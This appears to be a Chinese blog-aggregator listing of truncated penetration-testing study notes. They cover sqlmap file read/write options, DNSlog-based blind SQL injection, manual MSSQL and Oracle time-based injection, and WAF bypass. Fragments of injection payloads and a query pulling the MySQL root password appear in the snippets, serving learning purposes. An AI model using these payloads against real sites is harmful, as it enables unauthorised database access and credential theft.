原文:2019-10-29:渗透测试,基础学习,sqlmap文件读取,写入,dnslog盲注作用,mssql手工注入,笔记

sqlmap参数 file read,从数据库服务器中读取文件 file write, file dest,把文件上传到数据库服务器中 dnslog平台的学习和它在盲注中的应用 ,判断注入点 ,测试网站对DNSlog提供的url是否解析SELECT LOAD FILE CONCAT , SELECT password FROM mysql.user WHERE user root LIMIT , ...

2019-10-29 18:56 0 366 推荐指数:

查看详情

mssql手工

遇到中文的列名 利用unicode 进行单字节的转换 declare @s varchar(50);set @s = N'拉';select UniCode(@s),nchar(UniCode(@s)); 绕狗sql 方法 利用dnslog 进行sql ...

Sat May 25 01:46:00 CST 2019 1 472
SQL注入学习-Dnslog

1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS ...

Tue Feb 18 01:57:00 CST 2020 0 1808
一次sqlmap扫出的Oracle数据库时间手工复现验证

sqlmap扫出的Oracle时间截图 payload是 提示注入点是orgid参数,采用POST方式 由于第一次接触oracle的时间,对orgid=400后面的payload不太懂,遂百度查到oracle的时间主要有几种函数 手工测试时 ...

Tue Apr 12 16:52:00 CST 2022 0 901
MSSQL手工注入

一、手工注入 Step1:检测注入点   通过payload检测   http://……/less-1.asp?id=1' and 1=1--   http://……/less-1.asp?id=1' and 1=2-- Step2:判断数据库类型   select * from ...

Thu Oct 31 06:59:00 CST 2019 0 871
mssql手工注入

mssql注入是针对于sql server数据库的 sql server数据库和mysql数据库是有所区别的,语句命令之类的可自行百度。 平台:i春秋 内容:mssql手工注入 测试网站:www.test.com 找注入点 点击test 用数据类型转换爆错 ...

Thu Oct 31 16:09:00 CST 2019 0 353
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM